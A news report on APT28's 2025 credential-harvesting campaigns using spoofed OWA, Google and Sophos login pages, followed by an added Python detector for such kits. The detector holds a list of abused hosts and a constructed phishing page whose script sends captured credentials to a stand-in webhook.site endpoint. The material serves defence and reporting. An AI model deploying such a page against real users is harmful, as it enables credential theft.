
Russian state-sponsored threat actors have been implicated in a series of new credential harvesting attacks targeting individuals associated with Turkey’s Energy and Nuclear Research Institute, as well as staff affiliated with European think tanks and organizations in North Macedonia and Uzbekistan.
This activity is believed to be the work of APT28 (also known as BlueDelta) and is assessed to be part of the "ongoing" credential harvesting campaign that targeted users of UKR[.]NET last month. APT28 is linked to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
Recorded Future's Insikt Group said: "The use of Turkish-language and regionally targeted lure material suggests that BlueDelta has tailored its content to increase credibility among specific professional and geographic audiences. These selections reflect continued interest in organizations related to energy research, defense cooperation, and government communications networks related to Russian intelligence priorities."

The cybersecurity firm said the attacks targeted a small but distinct set of victims between February and September 2025, with the campaigns using fake login pages styled to resemble popular services such as Microsoft Outlook Web Access (OWA), Google, and the Sophos VPN portal.
The operation is notable in that, after credentials are entered on the fake landing page, unsuspecting users are redirected to the legitimate site so that no red flags are raised. The campaigns have also been found to rely heavily on services such as webhook[.]site, InfinityFree, Byet Internet Services, and ngrok to host the phishing pages, exfiltrate the stolen data, and handle the redirects.

In further attempts to appear legitimate, the threat actors are said to have used genuine PDF documents as decoys, including a June 2025 Gulf Studies Center publication on the Iran-Israel war and a July 2025 policy briefing on a new deal for the Mediterranean published by the climate change think tank ECCO.
The attack chain begins with a phishing email containing a shortened link which, when clicked, redirects the victim to a URL hosted on webhook[.]site. The decoy document is briefly displayed for about 2 seconds before the victim is redirected to a second webhook[.]site page that hosts a spoofed Microsoft OWA login page.
Embedded in this page is a hidden HTML form element that stores the webhook[.]site URL. JavaScript on the page uses it to send a "page opened" beacon, transmit the submitted credentials to the webhook endpoint, and finally redirect the victim to the PDF hosted on the legitimate website.
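As an added illustration, not code from the article or from Recorded Future, here is a defender-side heuristic that flags the three kit behaviours described above in a saved page: an endpoint on a disposable service (webhook[.]site, ngrok, free hosting) in a form action or hidden field, script-driven beaconing or submission, and a scripted redirect to the legitimate site. The ABUSED_HOSTS list, the phishing_indicators function and the sample page are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Services the report says the kits abused for hosting, exfil and redirects (example list).
ABUSED_HOSTS = ("webhook.site", "ngrok.io", "ngrok-free.app", "infinityfreeapp.com", "byethost")

class _Collector(HTMLParser):
    """Gathers form actions, URL-valued hidden inputs and inline script text."""
    def __init__(self):
        super().__init__()
        self.urls, self.scripts, self._in_js = [], [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.urls.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "hidden":
            if (a.get("value") or "").startswith("http"):
                self.urls.append(a["value"])
        elif tag == "script":
            self._in_js = True
    def handle_endtag(self, tag):
        self._in_js = self._in_js and tag != "script"
    def handle_data(self, data):
        if self._in_js:
            self.scripts.append(data)

def phishing_indicators(html):
    """Return the kit behaviours present in the page; all three together is a strong signal."""
    c = _Collector()
    c.feed(html)
    js = "".join(c.scripts)
    urls = c.urls + re.findall(r'''https?://[^\s'"<>)]+''', js)
    found = []
    if any(h in urlparse(u).netloc.lower() for u in urls for h in ABUSED_HOSTS):
        found.append("endpoint on disposable service")      # webhook/ngrok/free host
    if re.search(r"\bfetch\(|XMLHttpRequest|sendBeacon", js):
        found.append("script-driven beacon or submission")  # 'page opened' ping, credential POST
    if re.search(r"location(?:\.href|\.replace\(|\s*=)", js):
        found.append("scripted redirect")                   # bounce to the legitimate site
    return found

# Constructed sample modelled on the described OWA lure (not a real capture).
SAMPLE = """<html><head><title>Outlook Web Access</title></head><body><form id="f">
<input type="hidden" id="hook" value="https://webhook.site/EXAMPLE-ID"><input name="user">
<input type="password" name="pwd"></form><script>var hook = document.getElementById("hook").value;
fetch(hook + "?event=page_opened"); document.getElementById("f").onsubmit = function (e) {
 e.preventDefault(); fetch(hook, {method: "POST", body: new FormData(e.target)}).then(function () {
 window.location.href = "https://example.org/decoy.pdf"; }); };</script></body></html>"""
```

Run it over pages captured from a mail-gateway URL sandbox or a proxy archive; a single indicator is common on benign sites, so alert on the full combination rather than any one hit.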
APT28 has also been observed running three other campaigns:

- A June 2025 campaign that deployed a credential collection page mimicking a Sophos VPN password reset page, hosted on infrastructure provided by InfinityFree, which collects the credentials entered into a form and redirects victims to the legitimate Sophos VPN portal of an unnamed EU think tank.
- A September 2025 campaign that used a credential collection page hosted on an InfinityFree domain to falsely warn users about expired passwords and trick them into logging in; once credentials are entered, the victim is redirected to a legitimate login page associated with a military organization in the Republic of North Macedonia and an IT integrator based in Uzbekistan.
- An April 2025 campaign that used a fake Google password reset page hosted on Byet Internet Services to collect victim credentials and exfiltrate them to an ngrok URL.
“Blue Delta’s consistent abuse of legitimate Internet services infrastructure demonstrates the group’s continued reliance on disposable services to host and relay authentication data,” the Mastercard-owned company said. “These campaigns highlight the GRU’s continued commitment to credential collection as a low-cost, high-yield intelligence gathering method in support of Russian intelligence objectives.”
